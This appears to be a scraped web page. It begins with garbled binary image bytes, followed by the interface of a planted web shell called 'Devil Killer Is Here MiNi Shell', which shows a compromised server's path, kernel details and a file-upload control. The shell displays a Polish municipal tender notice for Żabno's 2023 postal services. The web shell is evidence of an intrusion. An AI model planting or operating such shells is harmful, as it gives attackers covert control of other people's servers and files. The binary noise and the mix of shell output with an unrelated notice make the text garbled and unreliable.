JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20221215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20221215/0049942701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych na potrzeby Urzędu Miejskiego w Żabnie w roku 2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Żabno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000529137</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ul. Władysława Jagiełły 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żabno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@zabno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zabno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych na potrzeby Urzędu Miejskiego w Żabnie w roku 2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a61ea62c-7c8e-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00499427</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00060177/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych na potrzeby Urzędu Miejskiego w Żabnie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/umwzabno,m,402331,2022.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu: <br/>–	miniPortalu, który dostępny jest pod adresem https://miniportal.uzp.gov.pl/, <br/>–	ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal, <br/>–	poczty elektronicznej dzp@zabno.pl, tgdowski@zabno.pl, amosio@zabno.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu: <br/>–	miniPortalu, który dostępny jest pod adresem https://miniportal.uzp.gov.pl/, <br/>–	ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal, <br/>–	poczty elektronicznej dzp@zabno.pl.<br/>2)	Zamawiający przewiduje również komunikację pomiędzy Zamawiającym a Wykonawca za pomocą poczty elektronicznej:<br/>a)	w sprawach dotyczących przedmiotu zamówienia – Artur Bucia, Urząd Miejski w Żabnie, ul. Jagiełły 1, 33-240 Żabno, w godz. 730 – 1300, tel. +48/14 645 60 12, wew. 24, e-mail: abucia@zabno.pl <br/>b)	w sprawach proceduralnych: <br/>– Tomasz Gdowski Urząd Miejski w Żabnie, ul. Jagiełły 1, 33-240 Żabno, w godz. 730 – 1300, tel. +48/14 645 60 12, e-mail: tgdowski@zabno.pl<br/>– Arkadiusz Mosio Urząd Miejski w Żabnie, ul. Jagiełły 1, 33-240 Żabno, w godz. 730 – 1300, tel. +48/14 645 60 12, e-mail: amosio@zabno.pl<br/>3)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>4)	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5)	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6)	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7)	Zamawiający przekazuje Identyfikator postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>8)	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej lub podpisem osobistym w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.. <br/>9)	Wykonawcy w korespondencji kierowanej do Zamawiającego powinni posługiwać się numerem przedmiotowego postępowania (znakiem sprawy).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>2)	Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych na potrzeby Urzędu Miejskiego w Żabnie w roku 2023.” <br/>3)	Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8, art. 18, art. 74, oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.<br/>4)	Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>5)	Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się Informacji nt. RODO - załącznik nr 7 do SWZ.<br/>6)	Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>7)	Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>–	obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego;<br/>–	obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego.<br/>8)	W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w załączniku nr 7 do SWZ.<br/>Sposób i zasady udostępniania danych osobowych określają zapisy SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.70.22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a)	część 1 pn. „Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych adresatom z terenu Gminy Żabno”. <br/>•	Przez pojęcie „adresatów z terenu Gminy Żabno” należy rozumieć adresatów, których docelowe miejsce dostarczenia przesyłki znajduje się w granicach administracyjnych Gminy Żabno<br/>•	Przedmiotem zamówienia jest świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania, doręczania przesyłek pocztowych, w tym doręczeń wynikających <br/>z Kodeksu postępowania administracyjnego i ordynacji podatkowej i ich ewentualnych zwrotów<br/>•	Usługi będące przedmiotem zamówienia będą świadczone zgodnie z przepisami powszechnie obowiązującego prawa, w szczególności zgodnie z przepisami:<br/>-	ustawą z dnia 23 listopada 2012 r. Prawo pocztowe i wydanymi na jej podstawie aktami wykonawczymi,<br/>-	ustawą z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego regulującej tryb doręczania pism nadawanych w postępowaniu administracyjnym,<br/>-	ustawą z dnia 29 sierpnia 1997 r. Ordynacja podatkowa regulującej tryb doręczania pism nadawanych w trybie ordynacji podatkowej,<br/>-	ustawą z dnia 17 listopada 1964 r. Kodeks postępowania cywilnego regulującym tryb doręczania pism nadawanych w postępowaniu cywilnym,<br/>-	innymi powszechnie obowiązującymi przepisami oraz zgodnie z regulaminem świadczenia usług pocztowych obowiązujący u Usługobiorcy.<br/>•	Zamawiający dopuszcza następujące sposoby przekazania Wykonawcy przesyłek pocztowych, wg dziennych zestawień sporządzonych przez pracownika Urzędu Miejskiego, codziennie w dni robocze tj. od poniedziałku do piątku: <br/>a)	odbiór przez upoważnionego pracownika Wykonawcy ww. przesyłek z Dziennika Podawczego Urzędu Miejskiego w Żabnie <br/>b)	dostarczenie ww. przesyłek przez upoważnionego pracownika Zamawiającego, do placówki Wykonawcy.<br/>•	Doręczania zwrotnych potwierdzeń odbioru przesyłek rejestrowanych oraz przesyłek zwróconych po wyczerpaniu możliwości ich doręczenia lub wydania odbiorcy, nie później jednak, niż w ciągu 7 dni po zaistnieniu którejś z wymienionych okoliczności, w dni robocze od poniedziałku do piątku, do siedziby Urzędu Miejskiego w Żabnie. <br/>•	Wykonawca dostarczy Zamawiającemu nieodpłatnie oznaczenia przesyłek oraz druków zwrotnego potwierdzenia odbioru. Treści zamieszczone na druku winny odzwierciedlać wymogi prawidłowego doręczenia przesyłki zgodnie z zasadami określonymi w ustawie Kodeks postępowania administracyjnego.<br/>•	Opakowanie przesyłek listowych stanowi koperta Zamawiającego, odpowiednio zabezpieczona. Opakowanie paczki powinno stanowić zabezpieczenie przed dostępem do jej zawartości. Ponadto powinno uniemożliwiać uszkodzenie przesyłki w czasie przemieszczania<br/>•	Przyjęcie przesyłek do obrotu pocztowego przez Wykonawcę będzie każdorazowo dokumentowane pieczęcią, podpisem i datą w pocztowej książce nadawczej dla przesyłek rejestrowanych oraz na zestawieniu ilościowo-wartościowym wg poszczególnych kategorii wagowych dla przesyłek nierejestrowanych<br/>•	Z tytułu niewykonania lub nienależytego wykonania umowy, w tym utraty, ubytku lub uszkodzenia przesyłki, Zamawiającemu przysługuje odszkodowanie oraz inne roszczenia na zasadach i wysokości określonych w ustawie Prawo pocztowe. <br/>•	Ilości poszczególnych przesyłek, wskazane w załączniku nr 4.1 do SWZ - Formularz asortymentowo-cenowy(część 1) są wielkościami oszacowanymi na podstawie faktycznie realizowanych przesyłek w roku poprzednim i służą wyłącznie wyliczeniu cen ofert w celu ich porównania i wyboru najkorzystniejszej oferty. Wykonawcy, z którym Zamawiający podpisze umowę, nie przysługuje roszczenie o realizację usługi w wielkościach podanych we wskazanym załączniku. <br/>•	Wynagrodzenie należne z tytułu usług pocztowych płatne będzie każdorazowo na podstawie prawidłowo wystawionej faktury wraz ze specyfikacją wykonanych usług, stosując miesięczny okres rozliczeniowy, w terminie wskazanym przez wykonawcę w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ, od daty doręczenia jej Zamawiającemu.<br/> <br/>3)	Wykonawca w formularzu ofertowym określi szacunkową cenę oferty brutto w zł (PLN), która stanowić będzie iloczyn szacunkowej ilości asortymentu (szacunkowa liczba została określona w formularzu asortymentowo –cenowym, odpowiednio dla części 1 - załącznik nr 4.1 i dla części 2 - załącznik nr 4.2 do SWZ) i cen jednostkowych zaoferowanych przez Wykonawcę w niniejszym formularzu. Szacunkowa, obliczona w ww. sposób cena stanowić będzie podstawę oceny i wyboru oferty najkorzystniejszej.<br/>4)	Podana w ofercie cena musi uwzględniać wszystkie koszty składające się na prawidłową realizację przedmiotu zamówienia wynikające z opisu przedmiotu zamówienia. <br/>5)	Wykonawca winien przewidzieć wszystkie okoliczności, które zmierzają do prawidłowego i należytego wykonania przedmiotu zamówienia oraz, które mogą wpłynąć na cenę zamówienia. <br/>6)	Rzeczywiste wynagrodzenie należne Wykonawcy będzie zależne od ilości faktycznie wykonanej ilości poszczególnych przesyłek pocztowych odpowiednio przemnożone przez ceny jednostkowe brutto zawarte w „Formularzu asortymentowo-cenowym”, stanowiącym odpowiednio dla części 1 - załącznik nr 4.1 i dla części 2 - załącznik nr 4.2 do SWZ<br/>7)	Płatność następować będzie na podstawie faktur wystawianych po zakończeniu każdego kalendarzowego miesiąca świadczenia usług. Dlatego też formularze asortymentowo-cenowe mają na celu umożliwienie dokonania wyceny poszczególnych elementów usług. <br/>8)	Rozliczenie między Zamawiającym, a Wykonawcą prowadzone będzie w walucie PLN.<br/><br/>Uwagi końcowe: <br/>–	Wykonawca wykona przedmiot zamówienia z należytą starannością, zgodnie z aktualnie obowiązującymi w tym zakresie przepisami, normami i standardami, etyką zawodową oraz postanowieniami niniejszej SWZ <br/>–	Do wykonania przedmiotu zamówienia Wykonawca użyje wyłącznie urządzeń, sprzętu <br/>i materiałów własnych, posiadających wymagane atesty i certyfikaty.<br/>–	W czasie realizacji przedmiotu zamówienia Wykonawca będzie usuwał i składował wszelkie urządzenia pomocnicze we własnym zakresie i na własny koszt,<br/>–	Wszelkie inne koszty realizacji przedmiotu zamówienia (koszty mediów – energia elektryczna, woda, opłaty, i inne), konieczne do poniesienia w celu prawidłowego wykonania zamówienia w czasie obowiązywania zawartej umowy, poniesie Wykonawca.<br/>–	Należy zachować szczególną ostrożność i zminimalizować uciążliwości związane <br/>z prowadzonymi pracami gdyż Wykonawca ponosił będzie pełną odpowiedzialność za szkody oraz następstwa nieszczęśliwych wypadków pracowników i osób trzecich, a powstałych w związku z prowadzonymi pracami w czasie obowiązywania umowy.<br/>–	Wykonawca jest odpowiedzialny za staranne zapoznanie się z dokumentami zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">64110000-0 - Usługi pocztowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">64113000-1 - Usługi pocztowe dotyczące paczek</p> <p class="mb-0">64120000-3 - Usługi kurierskie</p> <p class="mb-0">64112000-4 - Usługi pocztowe dotyczące listów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Znaczenie (pkt)<br/>1.	Cena	60 punktów<br/>2.	Termin płatności faktury	20 punktów<br/>3.	Sposób przekazania przesyłek pocztowych Wykonawcy	20 punktów<br/>	Razem	100 punktów<br/><br/>2)	Sposób dokonywania oceny ofert w kryterium „cena - Pc”:<br/><br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>3)	Sposób dokonywania oceny ofert w kryterium „termin płatności faktury - Pf”<br/>a)	20 punktów – płatność faktury w terminie do 30 dni od dnia jej doręczenia Zamawiającemu <br/>b)	10 punktów – płatność faktury w terminie do 21 dni od dnia jej doręczenia Zamawiającemu<br/>c)	0 punktów – płatność faktury w terminie do 14 dni od dnia jej doręczenia Zamawiającemu<br/> <br/>4)	Sposób dokonywania oceny ofert w kryterium „Forma przekazania przesyłek pocztowych Wykonawcy - Ps”<br/>a)	20 punktów – przekazanie przesyłek pocztowych Wykonawcy następuje w sposób odbioru przez upoważnionego pracownika Wykonawcy ww. przesyłek z Dziennika Podawczego Urzędu Miejskiego w Żabnie<br/>b)	0 punktów – przekazanie przesyłek pocztowych Wykonawcy następuje w sposób dostarczenia ww. przesyłek przez upoważnionego pracownika Zamawiającego do placówki Wykonawcy, z zastrzeżeniem, iż niniejsza placówka nie może znajdować się dalej niż 1 km od siedziby Zamawiającego<br/><br/>5)	Łączna wartość uzyskanych przez ofertę punktów ustalona zostanie jako suma punktów uzyskanych w kryterium „cena - Pc” , „termin płatności faktury – Pf” i „Forma przekazania przesyłek pocztowych Wykonawcy - Ps”<br/><br/>6)	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>7)	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Sposób przekazania przesyłek pocztowych 